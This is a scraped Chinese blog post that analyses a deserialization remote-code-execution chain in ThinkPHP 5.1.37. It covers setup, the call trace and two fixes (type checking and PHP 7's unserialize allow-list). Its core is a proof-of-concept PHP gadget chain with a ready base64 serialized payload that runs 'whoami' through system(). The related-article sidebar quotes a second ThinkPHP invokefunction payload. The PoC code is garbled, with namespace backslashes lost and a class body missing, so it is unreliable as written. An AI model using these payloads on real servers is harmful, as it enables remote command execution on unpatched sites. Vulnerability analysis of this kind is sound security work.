ThinkPHP V5.0.5漏洞_Thinkphp 5.1 反序列化漏洞分析

最新推荐文章于 2024-05-10 20:58:45 发布
最新推荐文章于 2024-05-10 20:58:45 发布
阅读量310 收藏
点赞数
文章标签: ThinkPHP V5.0.5漏洞

通过composer来进行环境搭建

composer create-project topthink/think=5.1.37 v5.1.37

待调试代码

v2-83516d662ab260e944ff8ff40d2e7460_b.jpg

POC 

<?php
namespace think;
abstract class Model{
 protected $append = [];
 private $data = [];
 function __construct(){
 $this->append = ["ethan"=>["dir","calc"]];
 $this->data = ["ethan"=>new Request()];
    }
}
class Request
{
 protected $hook = [];
 protected $filter = "system";
 protected $config = [
 // 表单请求类型伪装变量
 'var_method'       => '_method',
 // 表单ajax伪装变量
 'var_ajax'         => '_ajax',
 // 表单pjax伪装变量
 'var_pjax'         => '_pjax',
 // PATHINFO变量名 用于兼容模式
 'var_pathinfo'     => 's',
 // 兼容PATH_INFO获取
 'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
 // 默认全局过滤方法 用逗号分隔多个
 'default_filter'   => '',
 // 域名根,如thinkphp.cn
 'url_domain_root'  => '',
 // HTTPS代理标识
 'https_agent_name' => '',
 // IP代理获取标识
 'http_agent_ip'    => 'HTTP_X_REAL_IP',
 // URL伪静态后缀
 'url_html_suffix'  => 'html',
    ];
 function __construct(){
 $this->filter = "system";
 $this->config = ["var_ajax"=>''];
 $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}
namespace thinkprocesspipes;

use thinkmodelconcernConversion;
use thinkmodelPivot;
class Windows
{
 private $files = [];

 public function __construct()
    {
 $this->files=[new Pivot()];
    }
}
namespace thinkmodel;

use thinkModel;


{
}
use thinkprocesspipesWindows;
echo base64_encode(serialize(new Windows()));
/*input=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJkaXIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&id=whoami*/
?>

URL

http://127.0.0.1/v5.1.37/public/?id=whoami

字符串被反序列化以后,按照PHP流程,反序列化出来的Windows类,在php脚本快要结束的时候,析构方法被触发

v2-915b66050ca5efafa84865f5523fac0b_b.jpg

然后跟进removeFiles方法中

v2-86f20f285a237df87165d6734b958725_b.jpg

file_exists($filename) 中的 $filename 根据我们刚才构造的POC是一个Pivot类,file_exists要求传入一个字符串,这里就会触发__toString方法

但是我们查看代码实现,没有发现这个魔术方法

v2-e76d9f967de4a9ffaaee1dda75149db5_b.jpg

我们接着跟进它的父类查看实现,这个也同样没有找到__toString方法

v2-8fe91aad9bd521e5ce9677e6eb5d7af6_b.jpg

关注这一块的引用,根据PHP的规则在class中 use trait 会继承该trait实现的方法

v2-ecf51400d589626395acc7c53e63b302_b.jpg

在Conversion中发现了__toString方法的实现

v2-5219cd3d60f5c1bcba39bbbc6eba17ad_b.jpg

一直跟

v2-5329593b7c8bd19944394aef8b59a76f_b.jpg

最后是调用了toArray方法

v2-ced205382ae71f4e4d609615b2e554ba_b.jpg

在toArray方法中,189行$relation变量被赋值为poc中的Requst对象,然后在193行调用Requst对象的visible方法,

v2-422d7dfbcf7e0f4e4c0c7248eced4156_b.jpg

但是Request对象中没有visible这个方法所以触发了__call这个魔术方法

v2-75a05e6d8cfcde521ceee7a04092ee28_b.jpg

根据POC里面的定义

v2-b038c82253f30fb2a485cf95593d0271_b.png

触发了Requst对象里面的isAjax方法

v2-0340f39c48ec690b6fc5b36cb178d36e_b.jpg

经过层层调用,最后调用了input方法

v2-a8ebeb08a1115297ef174f62b452e628_b.jpg

最关键的地方来了

v2-e53d24349e2973ca6749782079157261_b.jpg

通过POC我们将这里的$filter变量污染成了system

v2-611a9e5eed62755a10b214539063ae59_b.jpg

关键函数array_walk_recursive

v2-c14a72144fef363a52fd4ab58f6dda3b_b.jpg

v2-eb96909db2c3edd8e13a9b2e5a32ac23_b.jpg

将whoami在system函数中执行,到这里命令执行成功

v2-9cba714c9ebeaf5edd2eeaf1f0fb14bf_b.jpg

整个漏洞完整调用堆载

v2-d7b35984647ce3c16370291528fefd46_b.jpg

修复方法:

1.框架态,针对Windows类进行修复,判断是否为string

v2-0ec386a1524557b56fe7dd47682f2563_b.jpg

2.用户态,使用PHP7新增的unserialize的过滤器

示例:

v2-e12f7c8c6c479dc77a3ef6e6ae9a1569_b.jpg

它通过白名单的方式来防止潜在的代码注入,将除 MyClass 和 MyClass2和stdClass之外的所有对象都转换为 __PHP_Incomplete_Class 对象,从而阻断反序列化的漏洞利用链

weixin_39829236
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用
weixin_39602280的博客
11-19 2471
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
ThinkPHP5.0.*版本代码执行漏洞
热门推荐
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_method 在Method方法中,将表单伪装变量对该方法的变量进行...
ThinkPHP V5.0.5漏洞_漏洞考古:thiknphp5 代码执行漏洞
weixin_39662142的博客
11-19 429
thinkphp版本:v5.0.5下载地址 https://www.thinkphp.cn/down/870.htmlpoc:?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 带poc访问index.php以后经过初始化以后,流程执行到App类...
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
最新发布
2401_84301389的博客
05-10 957
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP V5.0.5漏洞_告急:Dubbo出现严重漏洞,覆盖多个版本,附解决方案
weixin_39716088的博客
10-20 212
来源:华为云 & 安全客整理:Java面试那些事儿近日,国内各安全实验室检测到Apache Dubbo官方发布了CVE-2019-17564漏洞通告,判断漏洞等级为高,利用难度低,威胁程度高,影响面大。建议使用用户及时安装最新补丁,以免遭受黑客攻击。# 漏洞原理Apache Dubbo是一款应用广泛的高性能轻量级的Java 远程调用分布式服务框架,支持多种通信协议。当网站安装了A...
ThinkPHP V5.0.5漏洞_漏洞一披露就被利用,LineageOS、Ghost 服务器遭黑客入侵
weixin_39957318的博客
10-21 237
4月30日,安全公司 F-Secure 的研究人员披露了SaltStack两个高危漏洞CVE-2020-11651 和 CVE-2020-11652。而黑客行动迅速,很快就利用该漏洞对 LineageOS、Ghost 和DigiCert 的服务器发起了攻击。LineageOS 是一个非常受欢迎的 Android 分支,基本是 CyanogenMod 的复刻。5月3日,LineageOS官...
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5
02-24
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5 欢迎关注PHP学习博客:http://blog.csdn.net/column/details/14209.html
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
ThinkPHP v5.0.5 核心版
12-02
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队...
yershop_v3.0.2.zip_thinkphp5_thinkphp5.0_yershop_yershop漏洞_网店系统
07-14
yershop是基于thinkphp5.0.9,具有建站便捷、扩展丰富、二次开发灵活,以及支持云服务的特点,适合企业及个人快速构建个性化网上商店。 yershop采用模块化的架构设计思想,对目录结构规范做了调整,可以支持多模块...
ThinkPHP_v5.0.7.zip_ThinkPHP V5.0.7_thinkphp
09-23
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布
ThinkPHP V5.0.5漏洞_【每日安全资讯】滥用 ThinkPHP 漏洞的僵尸网络 Hakai 和 Yowai
weixin_39541681的博客
11-08 702
前言网络犯罪分子正在利用一个在2018年12月被发现和已修补的ThinkPHP漏洞传播Yowai(Mirai变种)和Hakai(Gafgyt变种)两种僵尸网络病毒。网络犯罪分子利用字典攻击破坏使用PHP框架创建网站的Web服务器,并获得这些路由器的控制,以实现分布式拒绝服务攻击(DDoS)。YowaiYowai(BACKDOOR.LINUX.YOWAI.A,由趋势科技检测)具有与其他Mirai变体...
Thinkphp5.1 ~ 5.2代码执行漏洞
公众号shadow sock7
01-16 9804
需要在library/think/Error.php中设置: error_reporting(0); http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/ 设置前(默认情况下): 设置后: payload: POST /thinkphp-5.1.29/html/public/ind...
ThinkPHP5远程代码执行高危漏洞(附:升级修复解决方法)
dabao87的博客
12-12 2万+
漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。 漏洞评级 严重 影响版本 ThinkPHP 5.0系列 &lt; 5.0.23 ThinkPHP 5.1系列 &lt; 5.1.31 安全版本 ThinkPHP 5.0系列 5.0.23 ThinkPHP 5.1系列 5.1.31 ...
快速开发后台不用太多代码的 tp5_「漏洞分析ThinkPHP5任意代码执行分析全记录...
weixin_39994438的博客
11-21 381
一 、前言ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的轻量级PHP开发框架,具有免费开源、快速、简单且面向对象等特点。在ThinkPHP的5.*版本中存在安全隐患,由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,可能出现getshell漏洞。受影响的版本包括5.0和5.1。本期安仔课堂,ISEC实验室的黄老师将为大家介绍Think...
ThinkPHP 5.0 * 远程代码执行漏洞分析
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
pathinfo 伪静态 详细解析PATH_INFO 和 ORIG_PATH_INFO技术分享
固破的专栏
12-04 3534
http://www.ape-men.com/bbs/43_1_1.html 服务器环境 linux/apache/mysql 问题描述         服务器开启了伪静态,并且也设置了伪静态文件.htaccess,但是伪静态不起作用,所有页面都跳转到了首页,我的伪静态文件如下: RewriteEngine on AcceptPathInfo On Rew...
(TP系列历史漏洞分析)Thinkphp 5.1.37反序列化漏洞分析
lllffg的博客
04-26 2322
Thinkphp 5.1.37反序列化漏洞 准备工作 安装Thinkphp 5.1.37环境 首先去github下载Thinkphp的源码,现在Thinkphp已经分为2个部分, https://github.com/top-think/framework/tags https://github.com/top-think/thinkphp/tags 下载5.1.37(最新版)对应的版本号 将framework改名为为thinkphp放到think-5.1.37中 复现过程 直接去/public/inde
ThinkPHP6反序列化漏洞核心原理
04-11
ThinkPHP6反序列化漏洞的核心原理是由于ThinkPHP6框架在处理反序列化时存在安全漏洞,攻击者可以构造恶意的序列化数据,通过该漏洞执行任意代码。具体原理如下: 1. ThinkPHP6框架使用了PHP的unserialize()函数来反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值